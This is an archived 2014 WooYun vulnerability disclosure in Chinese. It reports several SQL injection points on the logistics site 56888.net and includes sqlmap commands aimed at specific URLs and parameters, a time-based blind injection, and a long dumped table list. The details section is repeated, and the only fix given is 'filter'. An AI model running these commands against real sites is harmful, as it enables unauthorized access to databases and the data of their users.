当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2014-083366

漏洞标题:全国物流信息网多个注入点打包(涉及大量数据库信息)

相关厂商:全国物流信息网

漏洞作者: answer

提交时间:2014-11-17 14:02

修复时间:2015-01-01 14:04

公开时间:2015-01-01 14:04

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2014-11-17: 细节已通知厂商并且等待厂商处理中
2014-11-21: 厂商已经确认,细节仅向厂商公开
2014-12-01: 细节向核心白帽子及相关领域专家公开
2014-12-11: 细节向普通白帽子公开
2014-12-21: 细节向实习白帽子公开
2015-01-01: 细节向公众公开

简要描述:

http://www.wooyun.org/bugs/wooyun-2014-083231 这个能上前台(不知道是不是一家),打包只为上前台。求前台。。。。

详细说明:

看了这个洞 WooYun: 全国物流信息网SQL注入(涉及大量数据库信息) 看看呗 于是收获不小
注入点一:www.56888.net/Video/VideoDetails.aspx?id=1(重复)

FY9N@Z`]ZGPB9_QZ{PGJ_HN.jpg


D7UU1)(_N4KN3DMY5P~923T.jpg


sqlmap.py -u "http://www.56888.net/Video/VideoDetails.aspx?id=1" -D "web_56888_net" --tables
爆出大量数据库信息
太多 未复制完
| NT_web_companyPic |
| NT_web_leaveword |
| NT_web_message |
| NT_web_producet |
| NowTime |
| SPline |
| Shopping |
| ShoppingType |
| TenderMember |
| TenderMember |
| TenderOld |
| TenderService |
| UserInfomation |
| VIEW_GoodsStation_Pic |
| ZhaoPinTab |
| area |
| dtproperties |
| express |
| kuaidiCompany |
| pangolin_test_table |
| parent_area |
| syncobj_0x3033433531413745 |
| syncobj_0x3035354644303036 |
| syncobj_0x3036384231434146 |
| syncobj_0x3037323039414542 |
| syncobj_0x3037443538314635 |
| syncobj_0x3038383735463534 |
| syncobj_0x3039424439443938 |
| syncobj_0x3042334445393936 |
| syncobj_0x3042413536313138 |
| syncobj_0x3044364236373136 |
| syncobj_0x3045434230343743 |
| syncobj_0x3046353939344331 |
| syncobj_0x3133354144423536 |
| syncobj_0x3134454234364637 |
| syncobj_0x3135423345304630 |
| syncobj_0x3136324334393130 |
| syncobj_0x3136373033413532 |
| syncobj_0x3137334635434241 |
| syncobj_0x3141463333363139 |
| syncobj_0x3142323532334535 |
| syncobj_0x3144444538384435 |
| syncobj_0x3146344438343336 |
| syncobj_0x3230353132463243 |
| syncobj_0x3230353531383939 |
| syncobj_0x3230423333314237 |
| syncobj_0x3233364136463146 |
| syncobj_0x3237414234363633 |
| syncobj_0x3237423631364633 |
| syncobj_0x3237434336383441 |
| syncobj_0x3239314245464444 |
| syncobj_0x3239323334434344 |
| syncobj_0x3239353534313742 |
| syncobj_0x3241304434383732 |
| syncobj_0x3242334137374339 |
| syncobj_0x3242373738373139 |
| syncobj_0x3243434237443046 |
| syncobj_0x3245324143363141 |
| syncobj_0x3246354531443331 |
| syncobj_0x3246413735434641 |
| syncobj_0x3333373631443532 |
| syncobj_0x3335433039333738 |
| syncobj_0x3337453244313143 |
| syncobj_0x3337453433343037 |
| syncobj_0x3338344446333432 |
| syncobj_0x3338373141354636 |
| syncobj_0x3338424544304135 |
| syncobj_0x3338444635434443 |
| syncobj_0x3338464436314139 |
| syncobj_0x3339323734424435 |
| syncobj_0x3339463746354446 |
| syncobj_0x3341304344384244 |
| syncobj_0x3346383945314645 |
| syncobj_0x3430324631314144 |
| syncobj_0x3432363230354331 |
| syncobj_0x3433353442423544 |
| syncobj_0x3433463034413732 |
| syncobj_0x3436314542394431 |
| syncobj_0x3436353342384345 |
| syncobj_0x3438323433433631 |
| syncobj_0x3438463939433836 |
| syncobj_0x3442383345323336 |
| syncobj_0x3444433137333946 |
| syncobj_0x3445324544414641 |
| syncobj_0x3530344235443544 |
| syncobj_0x3531333631353641 |
| syncobj_0x3535413630414335 |
| syncobj_0x3539313039303239 |
| syncobj_0x3542313541363734 |
| syncobj_0x3542343642444542 |
| syncobj_0x3543433743424141 |
| syncobj_0x3545393735324443 |
| syncobj_0x3546323545363534 |
| syncobj_0x3546414636314439 |
| syncobj_0x3631443741454343 |
| syncobj_0x3635463642354535 |
| syncobj_0x3637354142333833 |
| syncobj_0x3641354441463643 |
| syncobj_0x3642303138443946 |
| syncobj_0x3644434234383539 |
| syncobj_0x3645453436304137 |
| syncobj_0x3730333038434344 |
| syncobj_0x3730363635384334 |
| syncobj_0x3730464538324242 |
| syncobj_0x3733423837463041 |
| syncobj_0x3733443133343337 |
| syncobj_0x3733443235423036 |
| syncobj_0x3733453037353931 |
| syncobj_0x3734384438333236 |
| syncobj_0x3734384443384637 |
| syncobj_0x3735353343343736 |
| syncobj_0x3737453331383135 |
| syncobj_0x3744333438353531 |
| syncobj_0x3745363046344641 |
| syncobj_0x3745393037393434 |
| syncobj_0x3745393437374538 |
| syncobj_0x3745443342423342 |
| syncobj_0x3832444538304346 |
| syncobj_0x3833344130454243 |
| syncobj_0x3833353542333531 |
| syncobj_0x3833463342343042 |
| syncobj_0x3838343135454245 |
| syncobj_0x3839303830433036 |
| syncobj_0x3839363235303538 |
| syncobj_0x3842383330393334 |
| syncobj_0x3843313639383234 |
| syncobj_0x3844433831313638 |
| syncobj_0x3846303637314631 |
| syncobj_0x3932463842394532 |
| syncobj_0x3933343346333733 |
| syncobj_0x3933413742423438 |
| syncobj_0x3933434645324143 |
| syncobj_0x3934383444353843 |
| syncobj_0x3935463845353435 |
| syncobj_0x3937303534383734 |
| syncobj_0x3938343534433433 |
| syncobj_0x3938353039374634 |
| syncobj_0x3938414639314432 |
| syncobj_0x3939394142343144 |
| syncobj_0x3941313739354645 |
| syncobj_0x3942343130303134 |
| syncobj_0x3944344643373833 |
| syncobj_0x3946323041333644 |
| syncobj_0x3946343442324235 |
| syncobj_0x4132384546354631 |
| syncobj_0x4135363741364341 |
| syncobj_0x4141443731424342 |
| syncobj_0x4144313435424438 |
| syncobj_0x4144464130333346 |
| syncobj_0x4145373630444343 |
| syncobj_0x4145444138384337 |
| syncobj_0x4146464544373039 |
| syncobj_0x4233393046433041 |
| syncobj_0x4234323438384643 |
| syncobj_0x4236374633354335 |
| syncobj_0x4236463241394239 |
| syncobj_0x4237313145463432 |
| syncobj_0x4238394244323439 |
| syncobj_0x4241394145423136 |
| syncobj_0x4241413132313646 |
| syncobj_0x4242304330333733 |
| syncobj_0x4242384544373439 |
| syncobj_0x4244444230333644 |
| syncobj_0x4246313331304437 |
| syncobj_0x4331354334314131 |
| syncobj_0x4333313837324144 |
| syncobj_0x4333314534413439 |
| syncobj_0x4333323433433336 |
| syncobj_0x4333353846434132 |
| syncobj_0x4334324238413939 |
| syncobj_0x4336384636303737 |
| syncobj_0x4336434532313745 |
| syncobj_0x4337423935313835 |
| syncobj_0x4343433146334134 |
| syncobj_0x4346353241314141 |
| syncobj_0x4430313241313034 |
| syncobj_0x4432443346424635 |
| syncobj_0x4438373743353835 |
| syncobj_0x4438423632353043 |
| syncobj_0x4446354344433435 |
| syncobj_0x4446363942363632 |
| syncobj_0x4531423834334145 |
| syncobj_0x4532394144323534 |
| syncobj_0x4535333442383930 |
| syncobj_0x4535343839323837 |
| syncobj_0x4536453046414539 |
| syncobj_0x4539383137414642 |
| syncobj_0x4539384535433838 |
| syncobj_0x4541343233304336 |
| syncobj_0x4541463137463644 |
| syncobj_0x4632434430443339 |
| syncobj_0x4633313932343244 |
| syncobj_0x4639464131303745 |
| syncobj_0x4642413234363031 |
| sysarticlecolumns |
| sysarticles |
| sysarticleupdates |
| sysdiagrams |
| sysextendedarticlesview |
| syspublications |
| sysreplservers |
| sysschemaarticles |
| syssubscriptions |
| systranschemas |
| title |
| video |
+----------------------------------------+
为深入拒绝查水表
注入点二:
http://www.56888.net/search/goodslist/?keywords=zz 时间盲注,稍微有点慢

`7`4XB`4Y0A)535K$2UIS1S.jpg


$AXWM0VWR2EV06M{G9HQM(F.jpg


注入点三:这是一个二级域名,但是确实一个库,所以沦陷:
http://wb.56888.net/TenderListProject.aspx?&tendertype=2&g=cg&s=fh&c=fg" -p "c" -D "web_56888_net" --tables

T)$(~D0RY9RG[YDK81}S(W4.jpg


一个库:就不列表了,与前面都相同

D7UU1)(_N4KN3DMY5P~923T.jpg


http://wb.56888.net/TenderList.aspx?&tendertype=0&g=s&s=s" -p "s" --dbs

2YDO~}88Z_~NR15WQKB}ACA.jpg


D7UU1)(_N4KN3DMY5P~923T.jpg

漏洞证明:

看了这个洞 WooYun: 全国物流信息网SQL注入(涉及大量数据库信息) 我也去练练手 于是发现这个站沦陷了。
注入点一:www.56888.net/Video/VideoDetails.aspx?id=1(重复)

FY9N@Z`]ZGPB9_QZ{PGJ_HN.jpg


D7UU1)(_N4KN3DMY5P~923T.jpg


sqlmap.py -u "http://www.56888.net/Video/VideoDetails.aspx?id=1" -D "web_56888_net" --tables
爆出大量数据库信息
太多 未复制完
| NT_web_companyPic |
| NT_web_leaveword |
| NT_web_message |
| NT_web_producet |
| NowTime |
| SPline |
| Shopping |
| ShoppingType |
| TenderMember |
| TenderMember |
| TenderOld |
| TenderService |
| UserInfomation |
| VIEW_GoodsStation_Pic |
| ZhaoPinTab |
| area |
| dtproperties |
| express |
| kuaidiCompany |
| pangolin_test_table |
| parent_area |
| syncobj_0x3033433531413745 |
| syncobj_0x3035354644303036 |
| syncobj_0x3036384231434146 |
| syncobj_0x3037323039414542 |
| syncobj_0x3037443538314635 |
| syncobj_0x3038383735463534 |
| syncobj_0x3039424439443938 |
| syncobj_0x3042334445393936 |
| syncobj_0x3042413536313138 |
| syncobj_0x3044364236373136 |
| syncobj_0x3045434230343743 |
| syncobj_0x3046353939344331 |
| syncobj_0x3133354144423536 |
| syncobj_0x3134454234364637 |
| syncobj_0x3135423345304630 |
| syncobj_0x3136324334393130 |
| syncobj_0x3136373033413532 |
| syncobj_0x3137334635434241 |
| syncobj_0x3141463333363139 |
| syncobj_0x3142323532334535 |
| syncobj_0x3144444538384435 |
| syncobj_0x3146344438343336 |
| syncobj_0x3230353132463243 |
| syncobj_0x3230353531383939 |
| syncobj_0x3230423333314237 |
| syncobj_0x3233364136463146 |
| syncobj_0x3237414234363633 |
| syncobj_0x3237423631364633 |
| syncobj_0x3237434336383441 |
| syncobj_0x3239314245464444 |
| syncobj_0x3239323334434344 |
| syncobj_0x3239353534313742 |
| syncobj_0x3241304434383732 |
| syncobj_0x3242334137374339 |
| syncobj_0x3242373738373139 |
| syncobj_0x3243434237443046 |
| syncobj_0x3245324143363141 |
| syncobj_0x3246354531443331 |
| syncobj_0x3246413735434641 |
| syncobj_0x3333373631443532 |
| syncobj_0x3335433039333738 |
| syncobj_0x3337453244313143 |
| syncobj_0x3337453433343037 |
| syncobj_0x3338344446333432 |
| syncobj_0x3338373141354636 |
| syncobj_0x3338424544304135 |
| syncobj_0x3338444635434443 |
| syncobj_0x3338464436314139 |
| syncobj_0x3339323734424435 |
| syncobj_0x3339463746354446 |
| syncobj_0x3341304344384244 |
| syncobj_0x3346383945314645 |
| syncobj_0x3430324631314144 |
| syncobj_0x3432363230354331 |
| syncobj_0x3433353442423544 |
| syncobj_0x3433463034413732 |
| syncobj_0x3436314542394431 |
| syncobj_0x3436353342384345 |
| syncobj_0x3438323433433631 |
| syncobj_0x3438463939433836 |
| syncobj_0x3442383345323336 |
| syncobj_0x3444433137333946 |
| syncobj_0x3445324544414641 |
| syncobj_0x3530344235443544 |
| syncobj_0x3531333631353641 |
| syncobj_0x3535413630414335 |
| syncobj_0x3539313039303239 |
| syncobj_0x3542313541363734 |
| syncobj_0x3542343642444542 |
| syncobj_0x3543433743424141 |
| syncobj_0x3545393735324443 |
| syncobj_0x3546323545363534 |
| syncobj_0x3546414636314439 |
| syncobj_0x3631443741454343 |
| syncobj_0x3635463642354535 |
| syncobj_0x3637354142333833 |
| syncobj_0x3641354441463643 |
| syncobj_0x3642303138443946 |
| syncobj_0x3644434234383539 |
| syncobj_0x3645453436304137 |
| syncobj_0x3730333038434344 |
| syncobj_0x3730363635384334 |
| syncobj_0x3730464538324242 |
| syncobj_0x3733423837463041 |
| syncobj_0x3733443133343337 |
| syncobj_0x3733443235423036 |
| syncobj_0x3733453037353931 |
| syncobj_0x3734384438333236 |
| syncobj_0x3734384443384637 |
| syncobj_0x3735353343343736 |
| syncobj_0x3737453331383135 |
| syncobj_0x3744333438353531 |
| syncobj_0x3745363046344641 |
| syncobj_0x3745393037393434 |
| syncobj_0x3745393437374538 |
| syncobj_0x3745443342423342 |
| syncobj_0x3832444538304346 |
| syncobj_0x3833344130454243 |
| syncobj_0x3833353542333531 |
| syncobj_0x3833463342343042 |
| syncobj_0x3838343135454245 |
| syncobj_0x3839303830433036 |
| syncobj_0x3839363235303538 |
| syncobj_0x3842383330393334 |
| syncobj_0x3843313639383234 |
| syncobj_0x3844433831313638 |
| syncobj_0x3846303637314631 |
| syncobj_0x3932463842394532 |
| syncobj_0x3933343346333733 |
| syncobj_0x3933413742423438 |
| syncobj_0x3933434645324143 |
| syncobj_0x3934383444353843 |
| syncobj_0x3935463845353435 |
| syncobj_0x3937303534383734 |
| syncobj_0x3938343534433433 |
| syncobj_0x3938353039374634 |
| syncobj_0x3938414639314432 |
| syncobj_0x3939394142343144 |
| syncobj_0x3941313739354645 |
| syncobj_0x3942343130303134 |
| syncobj_0x3944344643373833 |
| syncobj_0x3946323041333644 |
| syncobj_0x3946343442324235 |
| syncobj_0x4132384546354631 |
| syncobj_0x4135363741364341 |
| syncobj_0x4141443731424342 |
| syncobj_0x4144313435424438 |
| syncobj_0x4144464130333346 |
| syncobj_0x4145373630444343 |
| syncobj_0x4145444138384337 |
| syncobj_0x4146464544373039 |
| syncobj_0x4233393046433041 |
| syncobj_0x4234323438384643 |
| syncobj_0x4236374633354335 |
| syncobj_0x4236463241394239 |
| syncobj_0x4237313145463432 |
| syncobj_0x4238394244323439 |
| syncobj_0x4241394145423136 |
| syncobj_0x4241413132313646 |
| syncobj_0x4242304330333733 |
| syncobj_0x4242384544373439 |
| syncobj_0x4244444230333644 |
| syncobj_0x4246313331304437 |
| syncobj_0x4331354334314131 |
| syncobj_0x4333313837324144 |
| syncobj_0x4333314534413439 |
| syncobj_0x4333323433433336 |
| syncobj_0x4333353846434132 |
| syncobj_0x4334324238413939 |
| syncobj_0x4336384636303737 |
| syncobj_0x4336434532313745 |
| syncobj_0x4337423935313835 |
| syncobj_0x4343433146334134 |
| syncobj_0x4346353241314141 |
| syncobj_0x4430313241313034 |
| syncobj_0x4432443346424635 |
| syncobj_0x4438373743353835 |
| syncobj_0x4438423632353043 |
| syncobj_0x4446354344433435 |
| syncobj_0x4446363942363632 |
| syncobj_0x4531423834334145 |
| syncobj_0x4532394144323534 |
| syncobj_0x4535333442383930 |
| syncobj_0x4535343839323837 |
| syncobj_0x4536453046414539 |
| syncobj_0x4539383137414642 |
| syncobj_0x4539384535433838 |
| syncobj_0x4541343233304336 |
| syncobj_0x4541463137463644 |
| syncobj_0x4632434430443339 |
| syncobj_0x4633313932343244 |
| syncobj_0x4639464131303745 |
| syncobj_0x4642413234363031 |
| sysarticlecolumns |
| sysarticles |
| sysarticleupdates |
| sysdiagrams |
| sysextendedarticlesview |
| syspublications |
| sysreplservers |
| sysschemaarticles |
| syssubscriptions |
| systranschemas |
| title |
| video |
+----------------------------------------+
为深入拒绝查水表
注入点二:
http://www.56888.net/search/goodslist/?keywords=zz 时间盲注,稍微有点慢

`7`4XB`4Y0A)535K$2UIS1S.jpg


$AXWM0VWR2EV06M{G9HQM(F.jpg


注入点三:这是一个二级域名,但是确实一个库,所以沦陷:
http://wb.56888.net/TenderListProject.aspx?&tendertype=2&g=cg&s=fh&c=fg" -p "c" -D "web_56888_net" --tables

T)$(~D0RY9RG[YDK81}S(W4.jpg


一个库:就不列表了,与前面都相同

D7UU1)(_N4KN3DMY5P~923T.jpg


注入点四:
http://wb.56888.net/TenderList.aspx?&tendertype=0&g=s&s=s" -p "s" --dbs

2YDO~}88Z_~NR15WQKB}ACA.jpg


D7UU1)(_N4KN3DMY5P~923T.jpg

修复方案:

过滤

版权声明:转载请注明来源 answer@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:13

确认时间:2014-11-21 14:23

厂商回复:

最新状态:

暂无